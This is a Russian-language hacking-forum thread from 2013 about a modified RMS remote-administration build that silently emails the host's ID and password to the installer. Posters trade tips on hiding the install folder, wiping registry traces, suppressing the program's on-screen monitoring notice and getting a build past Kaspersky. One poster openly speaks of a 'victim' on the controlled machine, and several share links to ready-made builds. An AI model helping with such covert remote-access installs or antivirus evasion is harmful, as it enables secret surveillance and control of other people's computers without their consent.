RMS 5.1 c отправкой ID и pass на почту.

Тема в разделе "Статьи", создана пользователем крах, 14 сен 2011.

Статус темы:
Закрыта.
  1. 4ekkk
    4ekkk Новичок
    Симпатии:
    7
    Подчистил корзину от прозьб помочь, можете писать в личку.

23 янв 2013
  2. Роман
    Роман Новичок
    Симпатии:
    0
    Привет пацики.. Такая тема... Надо на RMS 5.0, версию старую, как то замутить чтобы не было окна о видео наблюдении что можно сделать?)))

26 янв 2013
  3. pupup2
    pupup2 Новичок
    Симпатии:
    0
    не парься,собери 5.4 или 5.3.1б2 ,это единственное что я могу тебе посоветовать.или попробуй эти :http://www.fayloobmennik.net/2563710 от 5.0 (пар 12345)

31 янв 2013
  4. SX2
    SX2 Новичок
    Симпатии:
    0
    Всем привет ! Не пойму что не так есть следующие проблемы
    1. При установке открывается сайт программы
    2. Открывается окно где я должен потвердить приход данных на мыло
    3.Папка с прогой не становится скрытой
    4.С реестра не удаляются ветки
    5.не копируются файлы в System32/sysfiles
    Вообщем все перепробывал вот архив с уже установленой сборкой !
    http://rghost.ru/43451937

31 янв 2013
  5. pupup2
    pupup2 Новичок
    Симпатии:
    0
    у тебя по ходу дела не сохраняются настройки( у меня такое было,винду переставил и все нормально..к сожалению не смог разобраться в чем причина этого ((

31 янв 2013
  6. SX2
    SX2 Новичок
    Симпатии:
    0
    Протестить можеш сборку что бы точно знать ?

31 янв 2013
  7. bobobo
    bobobo Новичок
    Симпатии:
    0
    scalpel
    заметил глюк с библиотечкой msimg32.dll. если запускать из под акка юзера от имени администратора, окно с подверждением отправки появляется на экране. замечено только на xp, на семёке всё гладко.

1 фев 2013
  8. Роман
    Роман Новичок
    Симпатии:
    0
    pupup2,
    Неее мене именно 5.0 нужно, потому что 5.4 туда не перезальешь, а жертву потерять боюсь)))))

1 фев 2013
  9. Gareev_1
    Gareev_1 Новичок
    Симпатии:
    0
    подскажите как скачать этот архив.. кликаю по ссылке, перекидывает на какой то сайт, пошла загрузка какой то ху*ни. ладно, думаю загрузчик, установил. щас у меня не Гугл Хром, а хер пойми че (какие то плагины понаставились). еще какой то левый браузер поставился.
    нельзя было на толковый файлообменник залить..?

2 фев 2013
  10. ParazziT
    ParazziT Новичок
    Симпатии:
    0
    Gareev_1,
    не надейся. Здесь и ф\обменники левые толкают и прочее фуфло. Если хошь по делу инфу получить, то будь готов бабла отдать - попросють. Мир не без добрых людей.. Ы-ы

2 фев 2013
  11. Gareev_1
    Gareev_1 Новичок
    Симпатии:
    0
    ParazziT,
    мда уж. люди же как то качали я смотрю. но как?

2 фев 2013
  12. ParazziT
    ParazziT Новичок
    Симпатии:
    0
    Gareev_1,
    качаешь с депозита - кому-то денюжка каплет. А скачаешь, то и не знаешь что и как с этим делать..

5 фев 2013
  13. igoryn56
    igoryn56 Новичок
    Симпатии:
    0
    Здравствуйте!
    Недавно появилась проблемка на удаленной машине, при установке рмс хоста (последней версии 5.4) пишет что более новая версия уже установлена, хотя на данный момент самая свежая версия 5.4, просканировал реестр на наличие Remote Manipulator System, оказывается кто-то или что то уже устанавливали до меня это ПО, удалив всю информацию из реестра связанную с RMS, и удалив сам хост из папкаи c:windows/system32/sysfiles/ . Пробую после перезагрузки установить версию хоста RMS 5.4 так и продолжает выдавать сообщение более новая версия уже установлена.
    Так вот подскажите где еще хранится инфо о версии хоста RMS ?
    С уважением, Игорь.

15 фев 2013
  14. wera87
    wera87 Новичок
    Симпатии:
    3
    ...\user\Application Data .
    там же хранятся и настройки сервера либо вьивера .

15 фев 2013
  15. scandalist
    scandalist Новичок
    Симпатии:
    3
    Windows Install Clean Up утилита от Microsoft. Она уже не выпускается, но можно найти и скачать в других местах. Чистит записи об установленных пакетах msi.

Вложения:

Последнее редактирование: 16 фев 2013
    16 фев 2013
  16. scalpel
    scalpel Новичок
    Симпатии:
    4
    А лучше вообще не использовать msi.

17 фев 2013
  17. faptobbly
    faptobbly Новичок
    Симпатии:
    0
    1) Народ а кто чей мануал использовал, Скандалиста ? или уже другой написали ?
    2) Чем отличается домашняя сборка RMS где генерируется ключ бесплатно, от платной версии ?
    P.S. Буду очень признателен если ответите !

18 фев 2013
  18. bobobo
    bobobo Новичок
    Симпатии:
    0
    faptobbly,
    Все настройки сервера (порт, привязка к сетевому интерфейсу и другие) хранятся в системном реестре. Вы можете скопировать эти настройки с одного компьютера на другой.

• Запустите стандартный редактор реестра Windows (c:\windows\regedit.exe).
    • Экспортируйте раздел реестра HKEY_LOCAL_MACHINE\SYSTEM\Remote Manipulator System\v4\Server\Parameters в файл, например settings.reg.
    • На машине, где нужно установить R-Server выполните команду regedit.exe /s путь_к_файлу\settings.reg

19 фев 2013
  19. skynet46
    skynet46 Новичок
    Симпатии:
    0
    РЕбят,выручаете не могу понять в чем дело =( тестил на более 5компах приходит письмо с ip,но при попытки соеденится с ними он пишет,что они не в сети,в чем проблема!!!??? а к себе коннектиться,тоже по иду и поролю с почты.

23 фев 2013
  20. bayan
    bayan Новичок
    Симпатии:
    0
    4ekkk,
    привет у меня готовая сборка,приустановке касперский не дает ей пролезть,можешь протестить что можно переделать чтоб дверь не скрипнула?

24 фев 2013
Статус темы:
Закрыта.
Загрузка...